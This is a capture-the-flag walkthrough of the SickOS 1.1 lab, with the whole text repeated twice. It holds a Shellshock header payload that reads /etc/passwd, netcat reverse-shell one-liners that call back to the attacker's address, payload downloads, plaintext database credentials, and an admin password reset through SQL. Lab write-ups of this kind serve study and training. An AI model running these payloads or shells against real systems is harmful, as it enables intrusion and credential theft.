Sick OS 1.1 Walkthrough Notes
SickOS - Ran from root-me.org - ctf13.root-me.org
##Port Scan
sudo nmap -Pn -sS ctf13.root-me.org -T4
PORT STATE SERVICE
22/tcp open ssh
3128/tcp open squid-http
8080/tcp closed http-proxy
-- Looks like we havea squid proxy running with an ssh client
-- Add network connection to proxy to port 3128
then try the following urls:
http://ctf13.root-me.org HUNG
http://ctf13.root-me.org:8080 HUNG
https://ctf13.root-me.org FAILED
https://ctf13.root-me.org:8080 FAILED
--Try to us curl to display the websites - sometimes the sites dont disaply straigh away when hanging..
curl -x http://ctf13.root-me.org:3128 -L http://ctf13.root-me.org HUNG
curl -x http://ctf13.root-me.org:3128 -L http://ctf13.root-me.org:8080 HUNG
-- Re run a port scan on all ports with -p- also with the -v option so that we can see what ports are found during the testing
-- Change the network settings to point to the IP address - 212.83.175.136
-- Add a hosts file to point the 212.83.175.136 to 127.0.0.1
-- Next we try to view 127.0.0.1 form the web browser and it resolves with a website that says "BLEHHH!!!"
--Also confirmed with curl
curl -x http://212.83.175.136:3128 -L http://127.0.0.1
"BLEHHH!!!"
-- Nothing in the page source
--quick check for robots.txt / .htaccess
--Next we do a dirb scan to enumerate the directories using the proxy settings like so..
dirb http://127.0.0.1/ -p http://212.83.175.136:3128
---- Scanning URL: http://127.0.0.1/ ----
+ http://127.0.0.1/cgi-bin/ (CODE:403 SIZE:285)
+ http://127.0.0.1/connect (CODE:200|SIZE:109)
+ http://127.0.0.1/index (CODE:200|SIZE:21)
+ http://127.0.0.1/index.php (CODE:200|SIZE:21)
+ http://127.0.0.1/robots (CODE:200|SIZE:45)
+ http://127.0.0.1/robots.txt (CODE:200|SIZE:45)
+ http://127.0.0.1/server-status (CODE:200|SIZE:3898)
Here we can see the a few files of interest. WE will look at the Code200 messages first as these allow us to view the contents - hence 200
the robots.txt file has the following:
User-agent: *
Disallow: /
Dissalow: /wolfcms
This tells use a directory we should try that is being dissallowed the Apache.
http://127.0.0.1/wolfcms
This opens a CMS system interface with lots to explore!
First lets try to work out the version number of wolfCMS - can see anything
A auick google search says it in the footer in the admin page - /admin
http://127.0.0.1/wolfcms/admin - FILE NOT FOUND
-So lets re run dirb with wolfcms
dirb http://127.0.0.1/wolfcms -p http://212.83.175.136:3128
--Another quick good tells us it depends if the mod_rewrite option is turned on in Apache
With mod_rewrite enabled you should find it here:
http://www.example.com/admin/
With mod_rewrite disabled this should work:
http://www.example.com/?admin/
-this redirects us to
http://127.0.0.1/wolfcms/?/admin/login
--We are presented with a login form!
--OK so lets see if the default creds work first.
-- Ok so from a quick google the username and password details are generated from the installaiton steps that we clearly dont have acces to.
-So brute force is pretty much out of the question..
no injection point for SQL injection at the moment.
--lets go back to the dirb results
-- So lets go back to nikto and run it against the full website instead of just the wolfcms system..
./nikto.pl -useproxy http://192.168.0.102:3128 -h http://192.168.0.102/ -C all
-- We see that shellshock could be available on the "/cgi-bin/status"
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
-- So we search for the python file through the exploitdb database using the offline "searchsploit" and find a python script
./searchsploit shellshock
-- Next we open up the script and add the proxy info into the script. We then add the following arguments as below::
python 34900.py pages="/cgi-bin/status" payload=reverse rhost=192.168.0.102 lhost=192.168.0.100 lport=4447
[!] Started reverse shell handler
[-] Trying exploit on : /cgi-bin/status
[!] Successfully exploited
[!] Incoming connection from 192.168.0.102
192.168.0.102>
-- Hurrah! we have a shell :-) (and we didn't need metasploit)
#####################################################################################################################
###############################PRIVILEGE ESCALATION##################################################################
#####################################################################################################################
--Great so now lets use the enum4linux script to see if any quick PrivEscalation techniques will work..
-- on the sender side we setup the nc sender script
sudo nc -v -w 40 -p 443 -l < enum4linux.pl
-- on the pentest machine (victim)
nc -v -w 10 192.168.0.100 443 > enum4linux.pl
-- next we add all permissions to the file
chmod 777 enum4linux.pl
-- This doesnt show the output of the command unfortunately due to the shellshock python script
-- Therefore we can use the pentestmonkeys nc script to make a true shell back to our system and try to run it again.
(sender)
sudo nc -v -w 40 -p 443 -l < php-reverse-shell.php
(victim)
192.168.0.102> nc -v -w 10 192.168.0.100 443 > php-reverse-shell.php
Connection to 192.168.0.100 443 port [tcp/https] succeeded!
-- This time it seems that something is blocking the connection, we try with multiple different ports but the same result..
--next we use 'wget' to dump out the /etc/passwd files by abusing the shellshock vulnerability.
wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" -e use_proxy=on -e http_proxy=192.168.0.102:3128 "http://192.168.0.102/cgi-bin/status"
Yep this worked!
Great so now we can try to make out connection this way and see if our nc session works by modifying it like so..
nope still nothing...
Well we found that pythin script earlier so lets use the shel shock 3900.py script to search for python.
WE do so with
'locate python'
-- Other options could be "which", "whereis"
-- we find it in the derault location /usr/bin/python as well as /usr/bin/python2.7
-- After attempting a few different methods 'python' 'ruby' etc.. all the network connections failed after a few seconds.
-- Next we use msfpayload to create a generic reverse netcat command and output it to the screen in raw format
msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.0.100 LPORT=4449 R
Output - mkfifo /tmp/mkbkikk; nc 192.168.0.100 4449 0</tmp/mkbkikk | /bin/sh >/tmp/mkbkikk 2>&1; rm /tmp/mkbkikk
-- next we setup up listener on our box
nc -l -p 4449 -v
-- then we execute the RAW output
mkfifo /tmp/mkbkikk; nc 192.168.0.100 4449 0</tmp/mkbkikk | /bin/sh >/tmp/mkbkikk 2>&1; rm /tmp/mkbkikk
-- now we can run this from the interactive shellshock prompt
-- b00m this time it worked :-)
-- Now we have a locked shell, we want our TTY shell.
-- First we run
python -c 'import pty; pty.spawn("/bin/sh")'
this gives us the shell prompt
$
--Lets run '/bin/bash'
$ /bin/bash
/bin/bash
www-data@SickOs:/home$
--or simply we can just do:
python -c 'import pty; pty.spawn("/bin/bash")'
And here we go :-)
next we use searchsploit to look for any kernel level exploits
we find an exploit - 41995.c - didn't work
Next we look at the wolfcms system
/var/www/wolfcms
and specifically the config file
config.php
In here we find the MySQL login details
// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
Now we can try to do priv esc via mysql or continue to look at wolfcms
-- Lets login to the wolf cms portal.
--To do this we;
first login to MySQL and check the version numbers
mysql> SHOW VARIABLES LIKE "%version%";
SHOW VARIABLES LIKE "%version%";
+-------------------------+-------------------------+
| Variable_name | Value |
+-------------------------+-------------------------+
| innodb_version | 5.5.46 |
| protocol_version | 10 |
| slave_type_conversions | |
| version | 5.5.46-0ubuntu0.12.04.2 |
| version_comment | (Ubuntu) |
| version_compile_machine | i686 |
| version_compile_os | debian-linux-gnu |
+-------------------------+-------------------------+
7 rows in set (0.00 sec)
mysql> use wolf;
mysql> show tables;
+-----------------+
| Tables_in_wolf |
+-----------------+
| cron |
| layout |
| page |
| page_part |
| page_tag |
| permission |
| plugin_settings |
| role |
| role_permission |
| secure_token |
| setting |
| snippet |
| tag |
| user |
| user_role |
+-----------------+
mysql> select id,name,email,username,password from user;
select id,name,email,username,password from user;
+----+---------------+--------------------+----------+----------------------------------------------------------------------------------------------------------------------------------+
| id | name | email | username | password |
+----+---------------+--------------------+----------+----------------------------------------------------------------------------------------------------------------------------------+
| 1 | Administrator | admin@yoursite.com | admin | 3a1be46a798dce0d880f633ce195b676839a0ce344c917a7ea1270816dcb649ce1e2b811b56fe93c9d3c4e679151180129ee9483ea39bff4d4578c4be6c77e1f |
+----+---------------+--------------------+----------+----------------------------------------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)
-- So because we dont know what the password is lets just reset it to somethign else. I know that 'apple' is d0be2dc421be4fcd0172e5afceea3970e2f3d940
--So lets reset that like so..
mysql> UPDATE user SET password='d0be2dc421be4fcd0172e5afceea3970e2f3d940' WHERE id=1
We also need to delete the value of 'salt'
mysql> select id,name,email,username,password,salt from user;
select id,name,email,username,password,salt from user;
+----+---------------+--------------------+----------+------------------------------------------+------------------------------------------------------------------+
| id | name | email | username | password | salt |
+----+---------------+--------------------+----------+------------------------------------------+------------------------------------------------------------------+
| 1 | Administrator | admin@yoursite.com | admin | d0be2dc421be4fcd0172e5afceea3970e2f3d940 | 6806b774443f2c34231eceddf156a42d3c26a2b5219ee9d55f5e3c9aea534167 |
+----+---------------+--------------------+----------+------------------------------------------+------------------------------------------------------------------+
So lets do that with:
mysql> UPDATE user SET salt='' WHERE id=1
UPDATE user SET salt='' WHERE id=1;
Query OK, 1 row affected (0.00 sec)
Rows matched: 1 Changed: 1 Warnings: 0
Now the value is blank :-)
and now we can access the admin webportal W00t!!!
Next we go back to the mySQL prompt try to do privielge escaltion
If we can run system commands, we maybe able to simply send an nc listener back as root for a Quick Win!
mkfifo /tmp/root; nc 192.168.0.100 4449 0</tmp/root | /bin/sh >/tmp/root 2>&1; rm /tmp/root
didnt work...
Next lets look to see whacih files have the SUID bit. If this is set it means that the file can be execute by the user but when
run it is run with root privileges.
find / -user root -perm -4000 -exec ls -ldb {} \;
nothign worked..
next we use the "linuxprivchecker.py"
we setup a simple http server on our linux box
python -m simpleHTTPserver 9090
and use wget to pull the file
wget 192.168.0.100:9090/linuxprivcheck.py
Run this and we find a high potential exploit with MySQL fro priv escalation
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
sO we copy this over with our http server aswell..
next we try to move in a uer account opposed to the www-data user
su sickos
we try to use the passwrd we found for the mysql password of john@123 and it works!
now we have the sickos user prompt.
we try a simple sudo privielege escalation and it works!
we have a root prompt.
If we woudl of tried this alot earlier we would of had root alot quicker!
SickOS - Ran from root-me.org - ctf13.root-me.org
##Port Scan
sudo nmap -Pn -sS ctf13.root-me.org -T4
PORT STATE SERVICE
22/tcp open ssh
3128/tcp open squid-http
8080/tcp closed http-proxy
-- Looks like we havea squid proxy running with an ssh client
-- Add network connection to proxy to port 3128
then try the following urls:
http://ctf13.root-me.org HUNG
http://ctf13.root-me.org:8080 HUNG
https://ctf13.root-me.org FAILED
https://ctf13.root-me.org:8080 FAILED
--Try to us curl to display the websites - sometimes the sites dont disaply straigh away when hanging..
curl -x http://ctf13.root-me.org:3128 -L http://ctf13.root-me.org HUNG
curl -x http://ctf13.root-me.org:3128 -L http://ctf13.root-me.org:8080 HUNG
-- Re run a port scan on all ports with -p- also with the -v option so that we can see what ports are found during the testing
-- Change the network settings to point to the IP address - 212.83.175.136
-- Add a hosts file to point the 212.83.175.136 to 127.0.0.1
-- Next we try to view 127.0.0.1 form the web browser and it resolves with a website that says "BLEHHH!!!"
--Also confirmed with curl
curl -x http://212.83.175.136:3128 -L http://127.0.0.1
"BLEHHH!!!"
-- Nothing in the page source
--quick check for robots.txt / .htaccess
--Next we do a dirb scan to enumerate the directories using the proxy settings like so..
dirb http://127.0.0.1/ -p http://212.83.175.136:3128
---- Scanning URL: http://127.0.0.1/ ----
+ http://127.0.0.1/cgi-bin/ (CODE:403 SIZE:285)
+ http://127.0.0.1/connect (CODE:200|SIZE:109)
+ http://127.0.0.1/index (CODE:200|SIZE:21)
+ http://127.0.0.1/index.php (CODE:200|SIZE:21)
+ http://127.0.0.1/robots (CODE:200|SIZE:45)
+ http://127.0.0.1/robots.txt (CODE:200|SIZE:45)
+ http://127.0.0.1/server-status (CODE:200|SIZE:3898)
Here we can see the a few files of interest. WE will look at the Code200 messages first as these allow us to view the contents - hence 200
the robots.txt file has the following:
User-agent: *
Disallow: /
Dissalow: /wolfcms
This tells use a directory we should try that is being dissallowed the Apache.
http://127.0.0.1/wolfcms
This opens a CMS system interface with lots to explore!
First lets try to work out the version number of wolfCMS - can see anything
A auick google search says it in the footer in the admin page - /admin
http://127.0.0.1/wolfcms/admin - FILE NOT FOUND
-So lets re run dirb with wolfcms
dirb http://127.0.0.1/wolfcms -p http://212.83.175.136:3128
--Another quick good tells us it depends if the mod_rewrite option is turned on in Apache
With mod_rewrite enabled you should find it here:
http://www.example.com/admin/
With mod_rewrite disabled this should work:
http://www.example.com/?admin/
-this redirects us to
http://127.0.0.1/wolfcms/?/admin/login
--We are presented with a login form!
--OK so lets see if the default creds work first.
-- Ok so from a quick google the username and password details are generated from the installaiton steps that we clearly dont have acces to.
-So brute force is pretty much out of the question..
no injection point for SQL injection at the moment.
--lets go back to the dirb results
-- So lets go back to nikto and run it against the full website instead of just the wolfcms system..
./nikto.pl -useproxy http://192.168.0.102:3128 -h http://192.168.0.102/ -C all
-- We see that shellshock could be available on the "/cgi-bin/status"
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
-- So we search for the python file through the exploitdb database using the offline "searchsploit" and find a python script
./searchsploit shellshock
-- Next we open up the script and add the proxy info into the script. We then add the following arguments as below::
python 34900.py pages="/cgi-bin/status" payload=reverse rhost=192.168.0.102 lhost=192.168.0.100 lport=4447
[!] Started reverse shell handler
[-] Trying exploit on : /cgi-bin/status
[!] Successfully exploited
[!] Incoming connection from 192.168.0.102
192.168.0.102>
-- Hurrah! we have a shell :-) (and we didn't need metasploit)
#####################################################################################################################
###############################PRIVILEGE ESCALATION##################################################################
#####################################################################################################################
--Great so now lets use the enum4linux script to see if any quick PrivEscalation techniques will work..
-- on the sender side we setup the nc sender script
sudo nc -v -w 40 -p 443 -l < enum4linux.pl
-- on the pentest machine (victim)
nc -v -w 10 192.168.0.100 443 > enum4linux.pl
-- next we add all permissions to the file
chmod 777 enum4linux.pl
-- This doesnt show the output of the command unfortunately due to the shellshock python script
-- Therefore we can use the pentestmonkeys nc script to make a true shell back to our system and try to run it again.
(sender)
sudo nc -v -w 40 -p 443 -l < php-reverse-shell.php
(victim)
192.168.0.102> nc -v -w 10 192.168.0.100 443 > php-reverse-shell.php
Connection to 192.168.0.100 443 port [tcp/https] succeeded!
-- This time it seems that something is blocking the connection, we try with multiple different ports but the same result..
--next we use 'wget' to dump out the /etc/passwd files by abusing the shellshock vulnerability.
wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" -e use_proxy=on -e http_proxy=192.168.0.102:3128 "http://192.168.0.102/cgi-bin/status"
Yep this worked!
Great so now we can try to make out connection this way and see if our nc session works by modifying it like so..
nope still nothing...
Well we found that pythin script earlier so lets use the shel shock 3900.py script to search for python.
WE do so with
'locate python'
-- Other options could be "which", "whereis"
-- we find it in the derault location /usr/bin/python as well as /usr/bin/python2.7
-- After attempting a few different methods 'python' 'ruby' etc.. all the network connections failed after a few seconds.
-- Next we use msfpayload to create a generic reverse netcat command and output it to the screen in raw format
msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.0.100 LPORT=4449 R
Output - mkfifo /tmp/mkbkikk; nc 192.168.0.100 4449 0</tmp/mkbkikk | /bin/sh >/tmp/mkbkikk 2>&1; rm /tmp/mkbkikk
-- next we setup up listener on our box
nc -l -p 4449 -v
-- then we execute the RAW output
mkfifo /tmp/mkbkikk; nc 192.168.0.100 4449 0</tmp/mkbkikk | /bin/sh >/tmp/mkbkikk 2>&1; rm /tmp/mkbkikk
-- now we can run this from the interactive shellshock prompt
-- b00m this time it worked :-)
-- Now we have a locked shell, we want our TTY shell.
-- First we run
python -c 'import pty; pty.spawn("/bin/sh")'
this gives us the shell prompt
$
--Lets run '/bin/bash'
$ /bin/bash
/bin/bash
www-data@SickOs:/home$
--or simply we can just do:
python -c 'import pty; pty.spawn("/bin/bash")'
And here we go :-)
next we use searchsploit to look for any kernel level exploits
we find an exploit - 41995.c - didn't work
Next we look at the wolfcms system
/var/www/wolfcms
and specifically the config file
config.php
In here we find the MySQL login details
// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
Now we can try to do priv esc via mysql or continue to look at wolfcms
-- Lets login to the wolf cms portal.
--To do this we;
first login to MySQL and check the version numbers
mysql> SHOW VARIABLES LIKE "%version%";
SHOW VARIABLES LIKE "%version%";
+-------------------------+-------------------------+
| Variable_name | Value |
+-------------------------+-------------------------+
| innodb_version | 5.5.46 |
| protocol_version | 10 |
| slave_type_conversions | |
| version | 5.5.46-0ubuntu0.12.04.2 |
| version_comment | (Ubuntu) |
| version_compile_machine | i686 |
| version_compile_os | debian-linux-gnu |
+-------------------------+-------------------------+
7 rows in set (0.00 sec)
mysql> use wolf;
mysql> show tables;
+-----------------+
| Tables_in_wolf |
+-----------------+
| cron |
| layout |
| page |
| page_part |
| page_tag |
| permission |
| plugin_settings |
| role |
| role_permission |
| secure_token |
| setting |
| snippet |
| tag |
| user |
| user_role |
+-----------------+
mysql> select id,name,email,username,password from user;
select id,name,email,username,password from user;
+----+---------------+--------------------+----------+----------------------------------------------------------------------------------------------------------------------------------+
| id | name | email | username | password |
+----+---------------+--------------------+----------+----------------------------------------------------------------------------------------------------------------------------------+
| 1 | Administrator | admin@yoursite.com | admin | 3a1be46a798dce0d880f633ce195b676839a0ce344c917a7ea1270816dcb649ce1e2b811b56fe93c9d3c4e679151180129ee9483ea39bff4d4578c4be6c77e1f |
+----+---------------+--------------------+----------+----------------------------------------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)
-- So because we dont know what the password is lets just reset it to somethign else. I know that 'apple' is d0be2dc421be4fcd0172e5afceea3970e2f3d940
--So lets reset that like so..
mysql> UPDATE user SET password='d0be2dc421be4fcd0172e5afceea3970e2f3d940' WHERE id=1
We also need to delete the value of 'salt'
mysql> select id,name,email,username,password,salt from user;
select id,name,email,username,password,salt from user;
+----+---------------+--------------------+----------+------------------------------------------+------------------------------------------------------------------+
| id | name | email | username | password | salt |
+----+---------------+--------------------+----------+------------------------------------------+------------------------------------------------------------------+
| 1 | Administrator | admin@yoursite.com | admin | d0be2dc421be4fcd0172e5afceea3970e2f3d940 | 6806b774443f2c34231eceddf156a42d3c26a2b5219ee9d55f5e3c9aea534167 |
+----+---------------+--------------------+----------+------------------------------------------+------------------------------------------------------------------+
So lets do that with:
mysql> UPDATE user SET salt='' WHERE id=1
UPDATE user SET salt='' WHERE id=1;
Query OK, 1 row affected (0.00 sec)
Rows matched: 1 Changed: 1 Warnings: 0
Now the value is blank :-)
and now we can access the admin webportal W00t!!!
Next we go back to the mySQL prompt try to do privielge escaltion
If we can run system commands, we maybe able to simply send an nc listener back as root for a Quick Win!
mkfifo /tmp/root; nc 192.168.0.100 4449 0</tmp/root | /bin/sh >/tmp/root 2>&1; rm /tmp/root
didnt work...
Next lets look to see whacih files have the SUID bit. If this is set it means that the file can be execute by the user but when
run it is run with root privileges.
find / -user root -perm -4000 -exec ls -ldb {} \;
nothign worked..
next we use the "linuxprivchecker.py"
we setup a simple http server on our linux box
python -m simpleHTTPserver 9090
and use wget to pull the file
wget 192.168.0.100:9090/linuxprivcheck.py
Run this and we find a high potential exploit with MySQL fro priv escalation
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
sO we copy this over with our http server aswell..
next we try to move in a uer account opposed to the www-data user
su sickos
we try to use the passwrd we found for the mysql password of john@123 and it works!
now we have the sickos user prompt.
we try a simple sudo privielege escalation and it works!
we have a root prompt.
If we woudl of tried this alot earlier we would of had root alot quicker!
No comments:
Post a Comment